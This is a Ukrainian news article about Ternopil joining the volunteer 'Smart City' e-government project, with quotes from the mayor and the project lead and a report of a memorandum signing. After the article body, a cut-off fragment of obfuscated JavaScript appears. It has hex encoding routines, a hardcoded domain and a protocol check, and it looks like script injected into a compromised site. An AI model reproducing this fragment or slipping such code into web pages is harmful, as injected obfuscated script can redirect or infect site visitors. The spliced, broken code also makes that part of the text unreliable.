Ви знаходитесь: Головна / Новини / Тернопіль активно працює в напрямку «Розумного міста»

Тернопіль активно працює в напрямку «Розумного міста»

Якщо в Естонії, рибалка будучи на середині озера може отримати ліцензію на вилов риби, то Україна лише впроваджує електронне урядування в дію. А Тернопіль – одне з міст, яке частину дороги у цьому напрямку вже здолало.

Стати «Розумними містом» та перейти до системи електронного урядування – програма мінімум для сучасних міст. Тернопіль також в тренді, для прикладу, систему електронних петицій містяни активно використовують. На черзі – відкритий бюджет.

СЕРГІЙ НАДАЛ, міський голова Тернополя

«Нас цікавить відкритість бюджету, нас цікавить відкритість спілкування з громадою, нас цікавить повністю електронний документообіг, який може бути впроваджений в міській раді. Без ваших зусиль, ми цього не зможемо зробити. Тим більше, сьогодні присутні представники і Тернополя в тому числі і ви реально розумієте, які є проблеми в місті, які можуть бути скарги, нарікання в тернополян, що треба поправити».

Допомогти із впровадженням електронного урядування взялися учасники волонтерського проекту «Розумне місто». Розпочали у 2014-му, з Кузнєцовська на Рівненщині.

ЄВГЕНІЯ ПОРЕМЧУК, керівник проекту «Розумне місто»

«Ми два роки там працювали, впроваджували багато інструментів електронного урядування, отримали дуже великий кейс досвіду і вирішили його імплементувати саме в такий продукт. Наразі, ми його роздаємо всім містам безкоштовно. В нас вже підключено близько 30 міст. Більшість з них дуже активно працюють. Йдуть перемовини ще з 20 містами».

Мета проекту, пояснює Євгенія, зібрати на одному сайті всю необхідну інформацію про місто та сервіси електронного урядування. Серед основних: петиції, проблеми ЖКГ, публічні фінанси, електронні закупівлі, опитування в процесі розробки – «модуль безпеки», база пошуку злочинців.

ЄВГЕНІЯ ПОРЕМЧУК, керівник проекту «Розумне місто»

«Тобто, ми приїжджаємо, даємо їм цей інструмент, допомагаємо його налаштувати, повністю проводимо навчання. Десь дистанційно, десь проводимо самі. В нас постійно йде підтримка, як користувачів, так і самих модераторів».

ЮРІЙ СУХОДОЛЯК, учасник семінару

«Приємно, що в Україні є багато, наприклад, організація «IRI», яка допомагає і «Центру підтримки громадських ініціатив» проводити зміни в законодавстві, щоб ми швидше рухалися до електронного урядування і також є відомий портал igov, який займається переведенням документованих послуг в електронну форму».

Завершився семінар підписанням меморандуму.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top